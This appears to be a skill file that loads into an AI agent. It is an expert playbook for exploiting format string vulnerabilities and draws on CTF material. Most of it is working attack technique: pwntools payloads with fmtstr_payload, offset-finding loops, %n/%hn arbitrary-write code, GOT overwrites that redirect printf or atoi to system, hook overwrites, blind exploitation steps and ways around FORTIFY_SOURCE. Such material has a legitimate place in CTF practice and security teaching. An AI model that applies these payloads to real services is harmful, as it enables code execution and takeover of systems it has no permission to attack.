--- name: format-string-exploitation description: >- Format string exploitation playbook. Use when printf-family functions receive user-controlled format strings, enabling arbitrary stack reads (%p/%s), arbitrary memory writes (%n/%hn/%hhn), GOT/hook overwrites, and canary/libc/PIE leaks. --- # SKILL: Format String Exploitation — Expert Attack Playbook > **AI LOAD INSTRUCTION**: Expert format string techniques. Covers stack reading, arbitrary write via %n, GOT overwrite, __malloc_hook overwrite, pointer chain exploitation, blind format string, FORTIFY_SOURCE bypass, 64-bit null byte handling, and pwntools automation. Distilled from ctf-wiki fmtstr, CTF patterns, and real-world scenarios. Base models often miscalculate positional parameter offsets or forget 64-bit address placement after format string. ## 0. RELATED ROUTING - [stack-overflow-and-rop](../stack-overflow-and-rop/SKILL.md) — combine format string leak with stack overflow for full exploit - [binary-protection-bypass](../binary-protection-bypass/SKILL.md) — format string is the primary canary/PIE/ASLR leak method - [arbitrary-write-to-rce](../arbitrary-write-to-rce/SKILL.md) — convert format string write primitive to code execution targets - [heap-exploitation](../heap-exploitation/SKILL.md) — heap address leak via format string for heap exploitation --- ## 1. VULNERABILITY IDENTIFICATION ### Vulnerable Pattern ```c printf(user_input); // VULNERABLE: user controls format string fprintf(fp, user_input); // VULNERABLE sprintf(buf, user_input); // VULNERABLE snprintf(buf, sz, user_input); // VULNERABLE printf("%s", user_input); // SAFE: format string is fixed ``` ### Quick Test ``` Input: AAAA%p%p%p%p%p%p%p%p If output shows stack values (hex addresses): format string confirmed Look for 0x4141414141414141 in output to find your input offset ``` --- ## 2. READING MEMORY ### Stack Leak (%p) | Format | Action | Use | |---|---|---| | `%p` | Print next stack value as pointer | Sequential stack dump | | `%N$p` | Print N-th parameter as pointer | Direct positional access | | `%N$lx` | Same as %p but explicit hex (64-bit) | Portable | | `%N$s` | Dereference N-th parameter as string pointer | Read memory at pointer value | ### Finding Your Input Offset ```python # Send: AAAAAAAA.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p # Output: AAAAAAAA.0x7ffd12340000.0x0.(nil).0x7f1234567890.0x4141414141414141... # ↑ offset = 6 (example) # Or automated: for i in range(1, 30): io.sendline(f'AAAA%{i}$p') if '0x41414141' in io.recvline(): print(f'Offset = {i}') break ``` ### Leaking Specific Values | Target | Method | Stack Position | |---|---|---| | Canary | `%N$p` where N = canary offset from format string | Typically at offset buf_size/8 + few | | Saved RBP | `%N$p` (just above return address) | Leaks stack address → stack base | | Return address | `%N$p` | Leaks .text address (PIE base = leak & ~0xfff - offset) | | Libc address | `%N$p` where N points to `__libc_start_main+XX` return on stack | libc base = leak - offset | ### Reading Arbitrary Address (%s) ``` # 32-bit: place address at start of format string payload = p32(target_addr) + b'%N$s' # N = offset where target_addr appears on stack # 64-bit: address contains null bytes → place AFTER format specifiers payload = b'%8$sAAAA' + p64(target_addr) # %8$s reads from offset 8 where address is ``` --- ## 3. WRITING MEMORY (%n) ### Write Specifiers | Specifier | Bytes Written | Width | |---|---|---| | `%n` | 4 bytes (int) | Characters printed so far | | `%hn` | 2 bytes (short) | Characters printed so far (mod 0x10000) | | `%hhn` | 1 byte (char) | Characters printed so far (mod 0x100) | | `%ln` | 8 bytes (long) | Characters printed so far | ### Arbitrary Write Technique **Goal**: Write value `V` to address `A`. **32-bit** (address on stack directly): ```python # Write 2 bytes at a time using %hn # Place target addresses in format string (they'll be on stack) payload = p32(target_addr) # for low 2 bytes payload += p32(target_addr + 2) # for high 2 bytes # Calculate padding for each %hn write low = value & 0xffff high = (value >> 16) & 0xffff payload += f'%{low - 8}c%{offset}$hn'.encode() payload += f'%{(high - low) & 0xffff}c%{offset+1}$hn'.encode() ``` **64-bit** (address AFTER format string): ```python # Addresses contain null bytes (0x00007fXXXXXXXX) which terminate string # Solution: place addresses AFTER the format specifiers # Step 1: format string portion (no null bytes) fmt = b'%Xc%N$hn%Yc%M$hn' # Step 2: pad to 8-byte alignment fmt = fmt.ljust(align, b'A') # Step 3: append target addresses fmt += p64(target_addr) fmt += p64(target_addr + 2) ``` ### Byte-by-Byte Write with %hhn Write one byte at a time for precision (6 writes for full 48-bit address on 64-bit): ```python writes = {} for i in range(6): byte_val = (value >> (i * 8)) & 0xff writes[target_addr + i] = byte_val # pwntools handles the math: from pwn import fmtstr_payload payload = fmtstr_payload(offset, writes, numbwritten=0, write_size='byte') ``` --- ## 4. PWNTOOLS fmtstr_payload() ```python from pwn import * # Overwrite GOT entry with target address payload = fmtstr_payload( offset, # stack offset where input appears {elf.got['printf']: libc.symbols['system']}, # {addr: value} numbwritten=0, # bytes already output before our input write_size='short' # 'byte', 'short', or 'int' ) # For 64-bit with addresses after format string: # fmtstr_payload handles this automatically ``` ### FmtStr Class (Interactive Exploitation) ```python from pwn import * def send_payload(payload): io.sendline(payload) return io.recvline() fmt = FmtStr(execute_fmt=send_payload) # fmt.offset is auto-detected fmt.write(elf.got['printf'], libc.symbols['system']) fmt.execute_writes() ``` --- ## 5. GOT OVERWRITE VIA FORMAT STRING ### Common Targets | Overwrite | With | Trigger | |---|---|---| | `printf@GOT` | `system` | Next `printf(user_input)` → `system(user_input)`, send `/bin/sh` | | `strlen@GOT` | `system` | If `strlen(user_input)` called | | `puts@GOT` | `system` | If `puts(user_input)` called | | `atoi@GOT` | `system` | If `atoi(user_input)` called (send `sh` as "number") | | `__stack_chk_fail@GOT` | Controlled addr | Bypass canary check entirely | | `exit@GOT` | `main` | Create infinite loop for multi-shot exploit | ### Hook Targets (glibc < 2.34) | Target | One-gadget | Trigger | |---|---|---| | `__malloc_hook` | one_gadget addr | Any `printf` with large format → internal `malloc` | | `__free_hook` | `system` | Trigger `free("/bin/sh")` | --- ## 6. STACK POINTER CHAIN EXPLOITATION When format string is **not directly on the stack** (e.g., stored in a heap buffer referenced by stack pointer), use pointer chains on the stack to achieve arbitrary write. ### Two-Stage Write ``` Stack: [offset A] → ptr_X (stack address pointing to another stack address) [offset B] → ptr_Y (target of ptr_X) Stage 1: Use %A$hn to modify ptr_X's low bytes → ptr_X now points to target_addr Stage 2: Use %B$n to write through the modified ptr_X → writes to target_addr ``` This requires finding **existing pointer chains** on the stack (e.g., saved frame pointers forming a chain: rbp → prev_rbp → prev_prev_rbp). ### Finding Pointer Chains ```python # Leak stack with %p, look for: # 1. Stack address A at offset N that points to another stack address B # 2. Stack address B at offset M # Modify value at A (using %N$hn) to change where B points # Then write through B (using %M$hn) to target ``` --- ## 7. BLIND FORMAT STRING Remote service, no binary, no source — exploit format string blind. ### Methodology | Step | Action | Purpose | |---|---|---| | 1 | Send `%p` × 50 | Dump stack, identify address patterns | | 2 | Identify offsets | Find libc addrs (0x7f...), stack addrs (0x7ff...), code addrs | | 3 | Find input offset | Send `AAAA%N$p` for N=1..50, find 0x41414141 | | 4 | Identify binary base | Code addresses reveal PIE base (or fixed base if no PIE) | | 5 | Leak GOT entries | If binary base known, read GOT via `%N$s` with GOT address | | 6 | Calculate libc base | GOT value - libc symbol offset | | 7 | Overwrite GOT | `%n` to rewrite GOT entry with system address | --- ## 8. FORTIFY_SOURCE BYPASS `FORTIFY_SOURCE` (gcc `-D_FORTIFY_SOURCE=2`) replaces `printf` with `__printf_chk` which **forbids `%N$n`** (positional writes). ### Bypass Techniques | Method | Detail | |---|---| | Use `%hn` sequentially (no positional) | Print exact byte count, `%hn`, adjust, `%hn` — fragile but works | | Stack-based exploit | If format string is on stack, use non-positional `%n` with stack position control | | Heap overflow instead | FORTIFY doesn't protect heap — combine with heap bug | | Return-to-printf | ROP to call unfortified `printf` (if available in binary or libc) | --- ## 9. 64-BIT CONSIDERATIONS | Challenge | Solution | |---|---| | Addresses contain `\x00` (null byte terminates format string) | Place addresses AFTER format specifiers, pad to alignment | | Address width: 6 significant bytes | Write 3 × `%hn` (2 bytes each) or 6 × `%hhn` | | Larger stack offset range | Input may be at offset 6+ due to 6 register args saved | | 48-bit address space | Only bottom 48 bits of 64-bit used | ### Layout Template (64-bit) ``` [format_string_specifiers][padding_to_8byte_align][addr1][addr2][addr3]... ← no null bytes here → ← null bytes OK (after fmt) → ``` --- ## 10. DECISION TREE ``` Format string vulnerability confirmed (printf(user_input)) ├── FORTIFY_SOURCE enabled? (__printf_chk) │ ├── YES → positional %n blocked │ │ ├── Sequential %n possible? → non-positional write │ │ └── Combine with another primitive (heap, ROP) │ └── NO → full positional %n available ├── What do you need first? │ ├── Leak canary → %N$p at canary stack offset │ ├── Leak PIE base → %N$p at return address offset → base = leak - known_offset │ ├── Leak libc base → %N$p at __libc_start_main return on stack │ ├── Leak heap base → %N$p at heap pointer on stack │ └── Leak specific address → %N$s with target address on stack ├── Architecture? │ ├── 32-bit → addresses at start of format string │ └── 64-bit → addresses after format string (null byte issue) ├── Write target? │ ├── Partial RELRO → GOT overwrite (printf→system, atoi→system) │ ├── Full RELRO → __malloc_hook or __free_hook (pre-2.34) │ ├── Full RELRO + glibc ≥ 2.34 → target _IO_FILE, exit_funcs, TLS_dtor_list │ └── Stack return address → direct overwrite (if ASLR bypassed) ├── Single-shot or multi-shot? │ ├── Loop (multi-shot) → overwrite GOT entry incrementally, use pointer chains │ └── One-shot → fmtstr_payload() with all writes in single payload └── Input not on stack? (heap buffer) └── Use stack pointer chains for indirect writes ```